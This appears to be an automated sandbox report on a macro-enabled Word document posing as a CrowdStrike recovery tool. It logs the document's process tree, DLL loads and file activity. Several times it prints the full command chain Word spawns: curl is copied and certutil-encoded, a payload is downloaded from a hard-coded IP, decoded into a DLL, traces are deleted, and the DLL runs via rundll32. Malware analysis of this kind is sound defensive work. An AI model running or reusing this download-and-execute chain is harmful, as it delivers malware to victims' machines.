Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w....................(.P.....(........................~..............#.......p.$.....................j.......................			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\xcopy.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

ReversingLabs: Detection: 26%

Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: unknown	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll			Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll			Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll			Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll			Jump to behavior

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image1.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image2.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image3.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = word/media/image1.jpg
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = word/media/image2.jpg
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = word/media/image3.jpg
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/styles.xml

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\GoogleUpdater			Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_3236_441263539			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: curl.pdb source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr

Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: VBA code instrumentation

OLE, VBA macro, High number of string operations: Module ThisDocument

Name: ThisDocument

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,

7_2_000000013F4A1D84

Source: curl.exe.4.dr

Static PE information: section name: _RDATA

Persistence and Installation Behavior

Source: C:\Windows\System32\xcopy.exe

